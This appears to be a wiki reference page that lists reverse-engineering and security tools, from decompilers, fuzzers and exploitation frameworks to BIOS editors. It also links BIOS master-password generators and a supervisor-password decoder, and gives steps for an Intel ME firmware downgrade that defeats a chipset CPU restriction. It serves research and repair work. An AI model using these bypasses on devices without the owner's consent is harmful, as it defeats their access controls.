:*[https://github.com/niranjan94/show-java ShowJava] - is an APK (android application), JAR & Dex decompiler for android.
:*[https://github.com/tp7309/TTDeDroid TTDeDroid] - is a tool for quickly decompiling apk/aar/dex/jar.
:*[https://github.com/JesusFreke/smali smali/baksmali] - is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax.

======RASP (Runtime Application Self-Protection) Android======
To effectively audit applications, testers often intentionally make their devices vulnerable to simplify testing. 
In response, application developers implement countermeasures such as detecting emulators, debuggers, and checking if the device is secure and not rooted. 
The current focus of this technology is on the vulnerabilities of Java and .NET platforms.
:*[https://arxiv.org/pdf/2312.17726 arXiv:2312.17726 (cs.CR)] - is a paper regarding Interactive Application Security Testing (IAST) and RASP Tools.
:*[https://github.com/securevale/android-rasp Android-RASP] - is a solution for protecting Android apps against being run on vulnerable devices.

======JAVA deobfuscators (mixed platforms)======
There is nothing more annoying than coroutines (ProGuard), c-flow, function virtualization, class and name renaming and junk code while decompiling code. Here are a few off the shelf deobfuscators.

:*[https://github.com/CalebFenton/simplify simplify] - Android virtual machine and generic deobfuscator.
:*[https://github.com/java-deobfuscator/deobfuscator deobfuscator] - is a project that aims to deobfuscate most commercially-available obfuscators for Java. [https://github.com/java-deobfuscator/deobfuscator-gui GUI version github]
:*[https://github.com/GraxCode/threadtear Threadtear] - is a multifunctional deobfuscation tool for java, ZKM and Stringer support, Android support is in development.
:*[https://github.com/narumii/Deobfuscator Another Deobfuscator] - Some deobfuscator for java. Supports superblaubeere27 / JObf / sb27, Paramorphism 2.1.2_9, Caesium, Monsey, Skid/qProtect, Scuti, CheatBreaker, Bozar, ...

======JAVA decompilers (platform independent)======
:*[https://github.com/fesh0r/fernflower Fernflower] - is a powerful open-source Java decompiler that reconstructs readable Java source code from compiled bytecode, widely used and integrated into IntelliJ IDEA.

====Debuggers / Disassemblers for '''unmanaged''' binaries====

=====AutoIt=====
AutoIt decompilers extract or anything else related to reverse engineering AutoIt binaries.
:*[https://github.com/JacobPimental/exe2aut exe2aut] - is a tool that converts executable (.exe) files into AutoIt script (.aut) source code, attempting to reverse-engineer compiled AutoIt programs.
:*[https://github.com/nazywam/AutoIt-Ripper AutoIt-Ripper] - is a short python script that allows for extraction of "compiled" AutoIt scripts from PE executables.

=====VB6=====
Early .NET applications compile native and p-code meaning there is not a easy way to decompile these like with newer .NET framework exectables.
:*[https://www.vb-decompiler.org/ VB Decompiler Pro] - is a commercial software tool that decompiles and analyzes programs written in Visual Basic 5.0/6.0 and also .NET for reverse engineering and code recovery purposes.

====Bytecode Decompilers====

=====React Native Hermes=====
If you plan on looking inside a compiled React Native Asset for doing a security audit, these tools come in handy.

:*[https://github.com/P1sec/hermes-dec hermes-dec] - A reverse engineering tool for decompiling and disassembling the React Native Hermes bytecode.
:*[https://github.com/Pilfer/hermes_rs hermes_rs] - Bytecode disassembler and assembler.
:*[https://github.com/bongtrop/hbctool hbctool] - Hermes Bytecode Reverse Engineering Tool (Assemble/Disassemble Hermes Bytecode).

=====Python=====
To reverse or decompile binaries generated by IronPython, which compiles Python code into Common Intermediate Language (CIL) targeting the Common Language Infrastructure (CLI), you should use decompilation tools designed for managed assemblies rather than traditional Python bytecode tools.
:*[https://github.com/rocky/python-uncompyle6 uncompyle6] - is a native Python cross-version decompiler and fragment decompiler. The successor to decompyle, uncompyle, and uncompyle2.
:*[https://github.com/zrax/pycdc pycdc] - is a C++ python bytecode disassembler and decompiler.
:*[https://github.com/Cisco-Talos/pyrebox PyREBox] - is a Python scriptable Reverse Engineering sandbox by Cisco-Talos. It is based on QEMU, and its goal is to aid reverse engineering by providing dynamic analysis and debugging capabilities from a different perspective.
:*[https://github.com/snare/voltron Voltron] - is an extensible debugger UI toolkit written in Python. It aims to improve the user experience of various debuggers (LLDB, GDB, VDB and WinDbg) by enabling the attachment of utility views that can retrieve and display data from the debugger host.

=====Lua=====
:*[https://github.com/scratchminer/unluac unlua] - is a decompiler that converts compiled Lua 5.1 bytecode files (.luac) back into readable Lua source code.

----

====Fuzzers====

*[https://github.com/google/honggfuzz Honggfuzz] - Security oriented software fuzzer. Supports evolutionary, feedback-driven fuzzing based on code coverage (SW and HW based).

*[https://llvm.org/docs/LibFuzzer.html LibFuzzer] - LibFuzzer is an in-process, coverage-guided, evolutionary fuzzing engine.

*[https://github.com/google/AFL '''(ARCHIVED)''' AFL (American fuzzy lop)] - is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary.

*[https://github.com/AFLplusplus/AFLplusplus AFL++ (AFLplusplus)] - The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!

*[https://github.com/carolemieux/afl-rb FairFuzz] - is a AFL extension to increase code coverage by targeting rare branches. FairFuzz has a particular advantage on programs with highly nested structure (packet analyzers, xmllint, programs compiled with laf-inte, etc).

*[https://github.com/RUB-SysSec/redqueen RedQueen] - is a fast general purpose fuzzer for x86 binary applications. It can automatically overcome checksums and magic bytes without falling back to complex and fragile program analysis techniques, such as symbolic execution.

*[https://github.com/sslab-gatech/qsym '''(ARCHIVED)''' QSYM] - ia a Practical Concolic Execution Engine Tailored for Hybrid Fuzzing.

*[https://github.com/puppet-meteor/MOpt-AFL MOpt-AFL] - is a AFL-based fuzzer that utilizes a customized Particle Swarm Optimization (PSO) algorithm to find the optimal selection probability distribution of operators with respect to fuzzing effectiveness. More details can be found in the technical report. The installation of MOpt-AFL is the same as AFL's.

====PC platform exploration frameworks====

*[https://github.com/chipsec/chipsec Chipsec] - is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low level interfaces, and forensic capabilities.

*[https://github.com/rapid7/metasploit-framework Metasploit Framework] - is a Ruby-based Framework, modular penetration testing platform that enables you to write, test, and execute exploit code.

*[https://github.com/BC-SECURITY/Empire Empire] - is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.

*[https://github.com/Arachni/arachni Arachni] - is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

*[https://portswigger.net/burp Burp Suite] - Burp or Burp Suite is a set of tools used for penetration testing of web applications.

====Mobile exploration frameworks====

*[https://github.com/MobSF/Mobile-Security-Framework-MobSF MobSF] - Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.

*[https://frida.re/ Frida] - Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.

*[https://github.com/sensepost/objection objection] - is a runtime mobile exploration toolkit, powered by Frida, built to help you assess the security posture of your mobile applications, without needing a jailbreak.

*[https://github.com/xtiankisutsa/MARA_Framework MARA] - is a Mobile Application RE and Analysis Framework. It is a toolkit that puts together commonly used mobile application RE and analysis tools to assist in testing mobile applications against the OWASP mobile security threats.

*[https://github.com/EntySec/SeaShell SeaShell] - is an iOS post-exploitation framework that enables you to access the device remotely, control it and extract sensitive information.

*[https://github.com/mingyuan-xia/AppAudit AppAudit] - is an efficient program analysis tool that detects data leaks in mobile applications. It can accurately find all leaks within seconds and ~200 MB memory.

*[https://github.com/canyie/pine Pine] - is a dynamic java method hook framework on ART runtime, which can intercept almost all java method calls in the current process.

*[https://github.com/LSPosed/LSPlant LSPlant] - is an Android ART hook library, providing Java method hook/unhook and inline deoptimization.

*[https://github.com/LSPosed/LSPosed LSposed] - is a Riru / Zygisk module trying to provide an ART hooking framework which delivers consistent APIs with the OG Xposed, leveraging LSPlant hooking framework.

::LSPosed Module Repository
:::*[https://github.com/Xposed-Modules-Repo Xposed Modules Repo] - New Xposed(LSPosed) Module Repository.

*[https://github.com/ElderDrivers/EdXposed Xposed Framework] - is a framework for mobile exploration hooking and modifying code on the fly. [https://binderfilter.github.io/xposed/ Inline API hooking example].

::Xposed modules
:::*[https://github.com/Fuzion24/JustTrustMe JustTrustMe] - Art framework hook to patch okHTTP and other common libs to fool the CERT chain in order for Mitmproxy to capture TLS traffic in cleartext.
:::*[https://github.com/sanfengAndroid/FakeXposed FakeXposed] - Hide xposed, root, file redirection, two-way shielding data detection.
:::*[https://github.com/ac-pm/SSLUnpinning_Xposed/ SSLUnpinning_Xposed] - Android Xposed Module to bypass SSL certificate validation (Certificate Pinning)..

::Xposed Framework API Development Documentation
:::*[https://api.xposed.info/reference/packages.html Xposed API Reference] - Javadoc reference of the Xposed Framework API. It's meant for module developers who want to understand which classes and methods they can use.

====Network Inspection====

=====Promiscuous mode eavesdropping TCP/UDP=====

::*[https://github.com/mitmproxy/mitmproxy Mitmproxy] - is an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.

::*[https://gitlab.com/wireshark/wireshark Wireshark] - is a network traffic analyzer, or "sniffer", for Linux, macOS, *BSD and other Unix and Unix-like operating systems and for Windows.

::*[https://github.com/zaproxy/zaproxy Zed Attack Proxy (ZAP)] - is an Open Source & easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

::*[https://github.com/SensePost/Mallet Mallet] - is an intercepting proxy for arbitrary protocols.

::*[https://github.com/Warxim/petep PETEP (PEnetration TEsting Proxy)] - is an open-source Java application for traffic analysis & modification using TCP/UDP proxies. PETEP is a useful tool for performing penetration tests of applications with various application protocols.

=====HTTP(S) Debuggers / Web Debuggers=====

::*[https://portswigger.net/burp Burp Suite] - is a proxy tool which helps to view, interact, modify web requests. Test, find, and exploit vulnerabilities faster with a complete suite of security testing tools.

::*[https://www.httpdebugger.com/ HTTP Debugger Pro] - is a network traffic analyzer tool that captures, displays, and analyzes HTTP and HTTPS traffic between a web browser or application and the internet for debugging and testing purposes.

::*[https://github.com/httptoolkit HTTP Toolkit] - is a beautiful, cross-platform & open-source HTTP(S) debugging proxy, analyzer & client, with built-in support for modern tools from Docker to Android to GraphQL.

::*[https://github.com/jbittel/httpry httpry] - is a HTTP logging and information retrieval tool written in Perl and C.

::*[https://github.com/requestly/requestly Requestly] - Bring the power of Charles Proxy, Fiddler & Postman together with beautiful, modern UI & collaboration features.

::*[https://telerik-fiddler.s3.amazonaws.com/fiddler/FiddlerSetup.exe Fiddler] - is a Web Debugger is a serviceable web debugging proxy for logging all HTTP(S) traffic linking your computer and the internet, allowing for traffic inspection, breakpoint setting, and more.

=====Other Network Tools=====

::*[https://learn.microsoft.com/en-us/sysinternals/downloads/tcpview tcpview] - is a tool that will enumerate all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions (Windows).

::*[https://www.nirsoft.net/utils/cports.html cports] - is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local Windows computer.

::*[https://www.netresec.com/?page=NetworkMinerSourceCode NetworkMiner] - is an open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files.

::*[https://linux.die.net/man/8/netstat netstat] - is a Linux CLI tool to print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.

----

====BIOS (basic input/output system) firmware modifying software====
Unified Extensible Firmware Interface (UEFI) & legacy computer BIOS (basic input/output system) firmware modifying software. 

=====UEFI=====
::*[https://github.com/LongSoft/UEFITool UEFITool / UEFIExtract / UEFIFind] - is a UEFI firmware image viewer and editor.
::*[https://github.com/LongSoft/IFRExtractor-RS IFRExtractor-RS] - is a Rust utility to extract UEFI IFR (Internal Form Representation) data found in a binary file into human-readable text.
::*[https://github.com/theopolis/uefi-firmware-parser uefi-firmware-parser] - is a cross-platform open source application written in Python. Very tinker-friendly. Can be used in scripts to automate firmware patching.
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.01_x64.exe AMIBCP_5.01_x64] - AMI BIOS Configuration Program (AMIBCP) is a powerful customization utility that enables OEMs/ODMs to customize the Aptio® ROM image without intervening on the source code. [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b VT link]
::*[https://github.com/tylernguyen/razer15-hackintosh/blob/master/tools/AMIBCP64/AMIBCP64.exe AMIBCP 5.01.0014 x64] [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b/details VT link]
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0023.exe AMIBCP_5.02.0023] [https://www.virustotal.com/gui/file/38f7c54098af1544ddba6324e6d1fea6d1462f422ba021f309ad4445dacd0467 VT link]
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0031.exe AMIBCP_5.02.0031] [https://www.virustotal.com/gui/file/c7ade67fe0e8f4c22f73ce3168ff6e718086f1eda83cce4c065b4fe49bd5ad99 VT link]
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP%205.02.0034.exe AMIBCP 5.02.0034] [https://www.virustotal.com/gui/file/7fe28fb8a7419c95fba428891e5b3914d9e2b365a5a8932da74db52a1c1dabd8 VT link]
::*[https://github.com/datasone/grub-mod-setup_var grub-mod-setup_var] - a modified grub allowing tweaking hidden BIOS settings. Does not work with newer (2012 & >>) InsydeH2o because of SMM protection or variable locking.
::*[https://github.com/JamesAmiTw/ru-uefi RU.EFI] - is a UEFI app that allows users to examine and modify UEFI variables within a system's BIOS while the system is running. It's essentially a tool for interacting with and altering firmware settings, and is often used for tasks like unlocking hidden BIOS settings or debugging firmware-related issues. Crashes on newer (2012 & >>) InsydeH2o upon loading from EFI shell possibly because of violating BIOS runtime security policies.

=====BIOS (legacy)=====
::*[https://forums.mydigitallife.net/threads/tool-to-insert-replace-slic-in-phoenix-insyde-dell-efi-bioses.13194 PhoenixTool] - is a Windows-only freeware GUI application written in C#. Used mostly for SLIC-related modifications, but it not limited to this task. Requires Microsoft .NET 3.5 to work properly. Supports unpacking firmware images from various vendor-specific formats like encrypted HP update files and Dell installers.
:::'''AMI'''
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.25.zip AMIBCP_2.25] [https://www.virustotal.com/gui/file/71050f3db40cc6c0a623d66c8eeb05d0a0818226fd11ed787452f4f540d45204 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.43.zip AMIBCP_2.43] [https://www.virustotal.com/gui/file/efa10cfe5f78c16982abf458eb50a4fde152631ad3b77838bd2013a763045ced VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.13.exe AMIBCP_3.13] [https://www.virustotal.com/gui/file/e0a5b1059f04813e72c6d4fa639d32567002fdd86321895b5987224a4518896e VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.37.exe AMIBCP_3.37] [https://www.virustotal.com/gui/file/1174e177b28fb7ecbac6c5043a9e8d78ff4756f657ea72369c5fb6b43b1f2623 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.46.exe AMIBCP_3.46] [https://www.virustotal.com/gui/file/84bd5b151286d4181ef26284d96ca49074e18574b8454c51cb0b34013ee5d073 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.47.exe AMIBCP_3.47] [https://www.virustotal.com/gui/file/20d93c6f868d4638676b7cde2c66c5589433c1480250aa0d774c4feef3337507 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.51.exe AMIBCP_3.51] [https://www.virustotal.com/gui/file/0d630b4b9c34d6c7132249a1a7bc3de33b39779fc90d9a367272cf57b4621aed VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.53.exe AMIBCP_4.53] [https://www.virustotal.com/gui/file/3f90e402dab9f64cbc4514e18bc2625ec7672da806cd9e0ef2e803b0ce104a01 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.55.exe AMIBCP_4.55] [https://www.virustotal.com/gui/file/451ad821a66e9ea89ee0544ce53cfab887dc0bb662a2de95f0e1aa1663dc6e06 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_2.22.1.exe MMTOOL_2.22.1] - MMtool stands for Module Management Tool. As one of AMI's BIOS/UEFI utilities, MMTool allows users to manage firmware file modules within the Aptio ROM image. [https://www.virustotal.com/gui/file/cf49f1e742f5cce68152f3c17df29e5c9aa7fb557c432402199159ffda44e007 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.12.exe MMTOOL_3.12] [https://www.virustotal.com/gui/file/78c3ca427878be5b07058f422914027462d3ac740b0de247169cc0aee4195e3b VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOl_3.19.exe MMTOOl_3.19] [https://www.virustotal.com/gui/file/b4b30c6ff911f18d3383b094628f59aa5ec3b109acd12aaef391acf9720e52af VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.19_Mod_21FiX.exe MMTOOL_3.19_Mod_21FiX] [https://www.virustotal.com/gui/file/66e2717fcac67b073d24916c74bc8d8dd7932b188d20b8b635b511e6195d5855 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22.EXE MMTOOL_3.22] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_1B_21Fix-BKMOD.EXE MMTOOL_3.22_1B_21Fix-BKMOD] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_CN_BKMod.exe MMTOOL_3.22_CN_BKMod] [https://www.virustotal.com/gui/file/f467d75962278a4e01d646cdf8008136912d8a1ddd588c45e2fcee9d7cd17140 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.23_CN_BKMod.exe MMTOOL_3.23_CN_BKMod] [https://www.virustotal.com/gui/file/9bf846d023312c889069b03f5ab7157e270fc67c5d295e745d0a5f27d12a71de VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.26.exe MMTOOL_3.26] [https://www.virustotal.com/gui/file/c5a64ea7ce2bea8556fa81e0069adbba793181bfaa76f59f4f472f0a471bac98 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_4.50.0.23.exe MMTOOL_4.50.0.23][https://www.virustotal.com/gui/file/7d0377a72e67e5a71400361416452440826832aeb2c9bebaa578e8af962eaafd VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.0.07.exe MMTOOL_5.0.07] [https://www.virustotal.com/gui/file/28049163fd1e3423c42b229a5f6ed877f14e7caf3b794bf7efb970b375e6ff41 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0024.exe MMTOOL_5.02.0024] [https://www.virustotal.com/gui/file/bbc3e75905997ddc05c523e57a72e49bbfcaf84dca64e460f10f8553b7fda9ee VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0025.exe MMTOOL_5.02.0025] [https://www.virustotal.com/gui/file/5d05d0bbea720d4b73dc66db55031c2659458696b9f143df3b7e2f43040289cc VT link]
:::'''Award'''
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/tree/main/Award_Bios_Editor Award Bios Editor] - is a editor for Award bios.
:::'''InsydeH2O'''
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.02.13.zip H2OEZE_x86_WIN_100.00.02.13] - H2OEZE™: Easy BIOS Editor that helps edit binaries in the BIOS, including Option ROMs, driver binaries, logos, and Setup values. [https://www.virustotal.com/gui/file/9660f1bf9436b258ec5ad857a94fbd0ec1f8fbff8ab22ca1dfcfb5ebbdcedf08 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.03.04.zip H2OEZE_x86_WIN_100.00.03.04] [https://www.virustotal.com/gui/file/2a1005803da854693502093445906eb2cccb24947d6828bc1533ba3603c73b0a VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x64/H2OEZE_x64_WIN_100.00.03.04.rar H2OEZE_x64_WIN_100.00.03.04] [https://www.virustotal.com/gui/file/20d2d0336d30afd0b1961eb42dc061ce66a6fcfbfba1530e7abd9be883dcb45c VT link]
:::'''Phoenix'''
:::*[[Media:PhoenixBiosEditor2.2.13.zip]] (pw: recessim.com [https://www.virustotal.com/gui/file/3abf75ea7386f3dc24156bf6175a940867b8c742246cb8bf257fe5fc0b1cf9b5 VT link]) - is a software tool used to view and modify the settings and structure of Phoenix BIOS firmware images dating from between 2004 and 2008.

:Download all* the above tools in one archive, [https://github.com/direstraits96/BIOS-MOD-TOOLS/archive/refs/heads/main.zip click here]. [https://www.virustotal.com/gui/file/d8a75883ca8d292adcf40e5ed88584579b1c0c69f6ad5837fc56747233c56f9c VT link]

:::'''Tool collections'''
:::*[http://xdel.ru/downloads/bios-mods.com-tools/ bios-mods.com tools (2016)] - is a collection of bios modifying and flashing tools.

:::'''Microcode Extraction Tool'''
:::*[https://github.com/platomav/MCExtractor MCExtractor] - is a tool which parses Intel, AMD, VIA and Freescale processor microcode binaries. It can be used by end-users who are looking for all relevant microcode information such as CPUID, Platform, Version, Date, Release, Size, Checksum etc.

:Bios password resetting
::*[https://archive.org/details/hp-bios-reset-mazzif HP BIOS Password Reset by MAZZIF] [https://www.virustotal.com/gui/file/9ddd094edc286f2cb8d63158d226986d9a0c184ca450580dfaf9754005df9d41 VT link] - A live USB tool made by Mazzif to reset older HP Probook and Elitebook BIOS passwords.

::*[[Media:Fujitsu bios unlock.zip|pwgen-fsi-6x4dec.py]] [https://www.virustotal.com/gui/file/3a43ba7c88f1f10576728ea291b3097c048f842eee30dda3121280c049c61b8a VT link] pwgen-fsi-6x4dec.py - is a python command-line utility for generating master unlock password for older Fujitsu notebooks. Tested on: E557, FH570, Q616, U728, T731, E734, U745, S752, E756

::*[https://github.com/dogbert/bios-pwgen/tree/master bios-pwgen] - BIOS Master Password Generators for older laptops [http://dogber1.blogspot.com/2009/05/table-of-reverse-engineered-bios.html blogpost] (dell, asus, fsi6x4, fxi-hex hpmini, insyde, samsung, sony-4x4, sony-serial).

::*[[Media:AMITSEDecrypt.zip]] [https://www.virustotal.com/gui/file/2b03ef2292863bd94dc6ce0f10412f27ec5abf95f1e3aca2d34dd3712fd45d12 VT link] - AMI supervisor password decoder called "AMITSEDecrypt" to decode them with the XOR key. Works on older AMI firmware images is able to recover supervisor password if set.

::*[https://bios-pw.org/ BIOS Master Password Generator (bios-pw.org)] - is a website that provides default or master BIOS unlock passwords for various laptop brands based on the system-generated hash or code displayed after too many failed BIOS password attempts.

=====HM70 PCH chipset Bypass Unsupported CPU=====
:Machine shuts down after 30 minutes if a '''"unsupported CPU"''' (Intel Core i3, i5 or i7) is installed in a notebook using the HM70 chipset. 
:The HM70 is aimed at entry-level laptops and budget-conscious consumers, and therefore is locked to [https://www.cpu-upgrade.com/mb-Intel_(chipsets)/HM70_Express.html support only dual core Pentium and Celeron CPUs..] 
:Intel has restricted this chipset in the firmware to shut down after 30 minutes if users attempt to upgrade their entry-level laptops.
::[[File:Hm70.png|none|thumb|200px|Intel HM70 PCH chipset. CPUs supported: Intel Pentium & Intel Celerons. [https://www.intel.com/content/www/us/en/products/sku/67419/mobile-intel-hm70-express-chipset/compatible.html Intel source]]]

======Intel Management Engine Firmware Downgrade Attack======

::First analyze the firmware after you have made a back-up. Make note of the Intel ME version.
::Then download the Intel ME version just below the firmware version you try to downgrade.
::Fire up your hex editor search in your bios blob for '''"0x24, 0x46, 0x50, 0x54, 0x0F, 0x00, 0x00, 0x00, 0x20"''' Intel ME 1.5M blob will start ascii text '''"$FPT"'''.
::Replace that entire section with the new downgraded Intel ME 1.5m blob. Before flashing make sure Me Analyzer recognises the change. Flash the modification and test it.
::If you don't see the ME version change with Me Analyzer first try to make note of the offset the Intel ME blob is at and then run it through me_cleaner before injecting a older one.

::This downgrade attack successfully bypassed the 30 minute shutdown restriction timer.

:'''Required tools''':
::*[[Software_Tools#Hex_Editors|Hex Editor.]]
::*[https://github.com/platomav/MEAnalyzer Me Analyzer] - Intel Engine & Graphics Firmware Analysis Tool.
::*[https://github.com/corna/me_cleaner me_cleaner] - Tool for partial deblobbing of Intel ME/TXE firmware images.
::*[https://winraid.level1techs.com/t/intel-conv-sec-management-engine-drivers-firmware-and-tools-2-15/30719 Intel (Converged Security) Management Engine: Drivers, Firmware and Tools for (CS)ME 2-15] - Useful resource.
::*[https://mega.nz/folder/2Q0klQpA#6o04nlV_4xqfx76tjvgi4g (CS)ME Firmware Archive.]

----

====Operating Systems====
Below are categories of operating systems used for various purposes, including binary reverse engineering, local software analysis, and wireless penetration testing with SDR for RF signal analysis.
=====Mostly X86-64=====
======Penetration Testing & Digital Forensics======
*[https://www.kali.org/ Kali Linux] - is an open-source, Debian-based Linux distribution geared towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering.

*[https://www.backbox.org/ BlackBox] is more than an operating system, it is a Free Open Source Community Project with the aim of promoting the culture of security in IT environment and give its contribution to make it better and safer.

*[https://blackarch.org/ BlackArch] - is an Arch Linux-based penetration testing distribution for penetration testers and security researchers.

*[https://www.parrotsec.org/ Parrot Security] - is based on top of Debian, the most advanced and recognized universal operating system that can run anywhere.

*[https://labs.fedoraproject.org/security/ Fedora Security Spin] - is a live media based on Fedora to provide a safe test environment for working on security auditing, forensics and penetration testing, coupled with all the Fedora Security features and tools.

*[https://www.caine-live.net/ CAINE] - CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project.

*[https://github.com/dracos-linux Dracos Linux] - is the Linux operating system from Indonesia, open source is built based on Debian live project under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering.

*[https://www.pentoo.ch/ Pentoo] - is a Live CD and Live USB designed for penetration testing and security assessment. Based off Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable livecd.

======RF Signals Analysis OS [RISC SBC & X86-64]======
*[https://cemaxecuter.com/ DragonOS] - Out of the box OS for SDRs. Supports Raspberry Pi and x86-64.

======Privacy Operating System======
*[https://tails.net/ Tails] - is a portable operating system that protects against surveillance and censorship.
*[https://www.qubes-os.org/ Qubes OS] - is a security-focused operating system that uses virtualization to isolate applications and tasks into separate compartments (called qubes), protecting the system even if one part gets compromised.
*[https://www.whonix.org/ Whonix] is a privacy-focused Linux distribution that routes all internet traffic through the Tor network using a two-part system of an isolated gateway and a workstation to provide strong anonymity and security.

======Windows 10 IoT LTSC======
*[https://rentry.co/LTSC LTSC IoT Windows 10 debloat & setup guide] [[Media:LTSC.pdf]] - Useful when you want a clean debloated Windows 10 virtual machine. The IoT LTSC channel receives security updates until Jan 13, 2032.

*[https://rentry.org/fwt2 fwt2] [[Media:Fwt2.pdf]] - Read the /fwt/ paste for a more general overview of Windows.

======Previous Windows versions======
*[https://hackandpwn.com/windows-7-esu-patching/ Windows 7 ESU Patching] - Information about the minimum set of updates needed for Windows 7 latest ESU hotfixes/patches.

=====Embedded Devices [Network equipment]=====

*[https://openwrt.org/ OpenWrt] - is an open-source project for embedded operating systems based on Linux, primarily used on embedded devices to route network traffic.

*[https://dd-wrt.com/ DD-WRT] - is a Linux based alternative OpenSource firmware suitable for a great variety of WLAN routers and embedded systems. The main emphasis lies on providing the easiest possible handling while at the same time supporting a great number of functionalities within the framework of the respective hardware platform used.

*[https://www.pfsense.org/ pfSense] - is a free and open-source operating system for firewalls and routers, primarily based on FreeBSD, that provides a comprehensive network security solution.

*[https://opnsense.org/ OPNsense] - is an open-source firewall and routing platform built on FreeBSD. It's designed to be user-friendly and easy to configure, offering a wide range of features found in commercial firewalls, plus many more.

=====Smartphones [Android "de-google"]=====

*[https://lineageos.org/ LineageOS] - is a free and open-source operating system for Android devices, based on the Android mobile platform.

*[https://grapheneos.org/ GrapheneOS] - is a privacy and security focused mobile OS with Android app compatibility developed as a non-profit open source project.

*[https://sailfishos.org/ Sailfish OS] - is a secure mobile operating system optimized to run on smartphones and tablets, and also easily adaptable to all kinds of embedded devices and use cases.

*[https://calyxos.org/ CalyxOS] - is a privacy-focused, "de-googled" Android-based operating system created by the Calyx Institute. It aims to defend online privacy, security, and accessibility by removing Google services and replacing them with free and open-source alternatives.

